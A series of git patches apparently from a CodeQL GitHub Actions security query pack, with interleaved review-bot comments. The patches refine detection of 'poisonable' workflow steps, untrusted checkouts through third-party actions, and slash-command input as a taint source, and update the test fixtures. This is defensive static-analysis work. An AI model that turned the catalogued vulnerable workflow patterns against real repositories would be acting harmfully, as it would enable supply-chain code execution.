.github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | 
.github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | 
.github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| 
.github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby 
scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -569,11 +576,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | 
@@ -606,8 +613,10 @@ cfgNodes | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -686,7 +695,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | 
@@ -719,8 +728,10 @@ dfNodes | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -800,7 +811,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:23:93 | .github/workflows/poisonable_steps.yml@5:5:23:93 | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:24:43 | .github/workflows/poisonable_steps.yml@5:5:24:43 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:9:9:6 | .github/workflows/poisonable_steps.yml@8:9:9:6 | 
@@ -833,8 +844,10 @@ nodeLocations | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:14:21:78 | .github/workflows/poisonable_steps.yml@21:14:21:78 | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:14:22:76 | .github/workflows/poisonable_steps.yml@22:14:22:76 | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:9:23:93 | .github/workflows/poisonable_steps.yml@23:9:23:93 | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:14:23:92 | .github/workflows/poisonable_steps.yml@23:14:23:92 | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:9:24:43 | .github/workflows/poisonable_steps.yml@24:9:24:43 | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:14:24:42 | .github/workflows/poisonable_steps.yml@24:14:24:42 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | 
.github/workflows/test.yml@8:20:8:50 | @@ -855,7 +868,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | From 20ce5d5344c2c7b6ff441b4295397e41e0b75723 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 12:59:16 +0200 Subject: [PATCH 0381/1267] Add JS local imports as Poisonable steps --- ql/lib/codeql/actions/security/PoisonableSteps.qll | 12 ++++++++++++ .../.github/workflows/poisonable_steps.yml | 5 +++++ ql/test/library-tests/poisonable_steps.expected | 13 +++++++------ 3 files changed, 24 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index b0c6f7aa6a9..e22662c64db 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -23,6 +23,18 @@ class PoisonableCommandStep extends PoisonableStep, Run { } } +class JavascriptImportnUsesStep extends PoisonableStep, UsesStep { + JavascriptImportnUsesStep() { + exists(string script, string line, string import_stmt | + this.getCallee() = "actions/github-script" and + script = this.getArgument("script") and + line = script.splitAt("\n").trim() and + import_stmt = line.regexpCapture(".*await\\s+import\\((.*)\\).*", 1) and + import_stmt.regexpMatch(".*\\bgithub.workspace\\b.*") + ) + } +} + class LocalScriptExecutionRunStep extends PoisonableStep, Run { string cmd; diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 608b3d5a09f..7be32ca5c17 100644 
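Review bot: The check `import_stmt.regexpMatch(".*\\bgithub.workspace\\b.*")` in `JavascriptImportnUsesStep` leaves the dot unescaped, so it accepts any character between `github` and `workspace`; `import_stmt.regexpMatch(".*\\bgithub\\.workspace\\b.*")` states the intent. The capture `.*await\\s+import\\((.*)\\).*` also only recognises `await import(...)`, so an `actions/github-script` step that loads a checked-out file through `require(...)` or a relative path would presumably not be reported as poisonable; a `// TODO` naming those forms would make the gap visible. The class has no QLDoc, and its name looks like a typo for `JavascriptImportUsesStep`.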
--- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -5,6 +5,11 @@ jobs: runs-on: ubuntu-latest steps: - run: venv/bin/activate # not supported yet + - uses: actions/github-script@v7 + with: + script: | + const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs') + return foo({ github, context, core }, body, number, sender) - run: . venv/bin/activate - run: echo foo; . venv/bin/activate - run: echo foo;. venv/bin/activate diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 52f38506f09..dc6b863d0b9 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,10 +1,6 @@ | .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | 
@@ -16,4 +12,9 @@ | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | From 1657af60dfb3debdb0cd8066d7927f29487e969d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 12:59:36 +0200 Subject: [PATCH 0382/1267] Model get-workflow-origin action --- .../security/UntrustedCheckoutQuery.qll | 26 +++++++++++++------ .../potiuk_get-workflow-origin.model.yml | 6 +++++ 2 files changed, 24 insertions(+), 8 deletions(-) create mode 100644 ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 8187bca9f04..a0bf48f9beb 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
@@ -99,9 +99,13 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" ] and // TODO: This should be read step of the head_sha or head_ref output vars - this.getArgument("ref").matches("%.head_ref%") + this.getArgument("ref").regexpMatch(".*(head_ref).*") or - step.getCallee() = ["github/branch-deploy"] and + step.getCallee() = "potiuk/get-workflow-origin" and + // TODO: This should be read step of the ref output var + this.getArgument("ref").matches("%." + ["sourceHeadBranch", "pullRequestNumber"]) + or + step.getCallee() = "github/branch-deploy" and // TODO: This should be read step of the ref output var this.getArgument("ref").matches("%.ref%") ) and @@ -149,12 +153,18 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { or // 3rd party actions returning the PR head sha/ref exists(UsesStep step | - step.getCallee() = - [ - "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", - "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" - ] and - this.getArgument("ref").regexpMatch(".*head_sha.*") and + ( + step.getCallee() = + [ + "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", + "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" + ] and + this.getArgument("ref").regexpMatch(".*(head_sha).*") + or + step.getCallee() = "potiuk/get-workflow-origin" and + // TODO: This should be read step of the ref output var + this.getArgument("ref").matches("%." + ["sourceHeadSha", "mergeCommitSha"]) + ) and DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) ) or diff --git a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml new file mode 100644 index 00000000000..0acee71af26 --- /dev/null +++ b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml 
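Review bot: The new `potiuk/get-workflow-origin` branch uses `matches("%." + ["sourceHeadBranch", "pullRequestNumber"])`, a pattern with no trailing `%`, so it only holds when the `ref` argument ends exactly in the output name. The neighbouring checks (`%.ref%`, `.*(head_ref).*`) allow trailing text, which suggests the argument still carries the closing `}}` of the expression; if so, these checkouts are silently missed. Appending the wildcard fixes it: `this.getArgument("ref").matches("%." + ["sourceHeadBranch", "pullRequestNumber"] + "%")`. The same applies to `["sourceHeadSha", "mergeCommitSha"]` in the `ActionsSHACheckout` hunk that follows. Both class bodies continue outside their hunks.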
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["potiuk/get-workflow-origin", "*", "output.sourceHeadBranch", "branch", "manual"] From a2af3c654b59ae2a434d710b77aae82d01fdae5a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 20:46:29 +0200 Subject: [PATCH 0383/1267] Account for all npm and pnpm subcommands Exclude args such as `npm -v` --- ql/lib/ext/config/poisonable_steps.yml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index ff3df1f699c..56ba567aa45 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -32,12 +32,8 @@ extensions: - ["msbuild"] - ["mvn"] - ["mypy"] - - ["npm i(nstall)?"] - - ["npm run"] - - ["npm ci"] - - ["pnpm i(nstall)?"] - - ["pnpm run"] - - ["pnpm ci"] + - ["npm [a-z]"] + - ["pnpm [a-z]"] - ["pre-commit"] - ["prettier"] - ["pip install -r"] From ee265c48796441149bf579b81237eaf5359bbebb Mon Sep 17 00:00:00 2001 
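Review bot: The replacement entries `["npm [a-z]"]` and `["pnpm [a-z]"]` require the subcommand to follow the tool name directly. Depending on how the consuming predicate anchors these patterns (not visible in this hunk), an invocation with a leading option such as `npm --prefix web ci` would not be matched, while subcommands that run no repository code (`npm help`, `npm view`) now are. A comment above the two entries would record that trade-off, e.g. `# any subcommand counts; flag-only calls such as npm -v are excluded on purpose`, so that a later edit does not narrow or widen the match by accident.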
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 22:38:53 +0200 Subject: [PATCH 0384/1267] fix(models): Slash-command-action Do not consider slash-command-action command-arguments as a remote flow source if it requires write or admin permissions --- .../codeql/actions/dataflow/FlowSources.qll | 12 + ql/lib/codeql/actions/dataflow/FlowSteps.qll | 18 +- .../xt0rted_slash-command-action.model.yml | 7 - ql/test/library-tests/test.expected | 414 +++++++++--------- .../.github/workflows/slash_command1.yml | 21 + .../.github/workflows/slash_command2.yml | 21 + .../CWE-094/CodeInjectionCritical.expected | 4 + .../CWE-094/CodeInjectionMedium.expected | 3 + 8 files changed, 294 insertions(+), 206 deletions(-) delete mode 100644 ql/lib/ext/manual/xt0rted_slash-command-action.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 79934ca586b..34f8c76df67 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -222,3 +222,15 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } } + +class Xt0rtedSlashCommandSource extends RemoteFlowSource { + Xt0rtedSlashCommandSource() { + exists(UsesStep u | + u.getCallee() = "xt0rted/slash-command-action" and + u.getArgument("permission-level").toLowerCase() = ["read", "none"] and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index caa09e9c7e2..46c42da2652 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
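Review bot: `Xt0rtedSlashCommandSource` has no QLDoc, and its key assumption is implicit: a step that omits `permission-level` produces no source, because `u.getArgument("permission-level")` then has no value to compare with `["read", "none"]`. That is only correct if the action's default level requires write access, which should be stated on the class, e.g. `/** Output of xt0rted/slash-command-action when permission-level is read or none; an omitted level is assumed to default to write and is not treated as a source. */`. A `permission-level` supplied through an expression rather than a literal is not covered either, which is worth noting in the same comment.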
@@ -217,7 +217,7 @@ predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node suc */ predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { exists(StepsExpression o | - pred instanceof TJActionsChangedFilesSource and + pred instanceof TJActionsVerifyChangedFilesSource and o.getTarget() = pred.asExpr() and o.getStepId() = pred.asExpr().(UsesStep).getId() and o.getFieldName() = "changed_files" and @@ -225,12 +225,26 @@ predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::No ) } +/** + * A read of user-controlled field of the xt0rted/slash-command-action action. + */ +predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof Xt0rtedSlashCommandSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "command-arguments" and + succ.asExpr() = o + ) +} + class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) or artifactDownloadToUseStep(node1, node2) or dornyPathsFilterTaintStep(node1, node2) or tjActionsChangedFilesTaintStep(node1, node2) or - tjActionsVerifyChangedFilesTaintStep(node1, node2) + tjActionsVerifyChangedFilesTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) } } diff --git a/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml b/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml deleted file mode 100644 index 0910261d21d..00000000000 --- a/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml +++ /dev/null @@ -1,7 +0,0 @@ -extensions: - - addsTo: - pack: github/actions-all - extensible: actionsSourceModel - data: - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] 
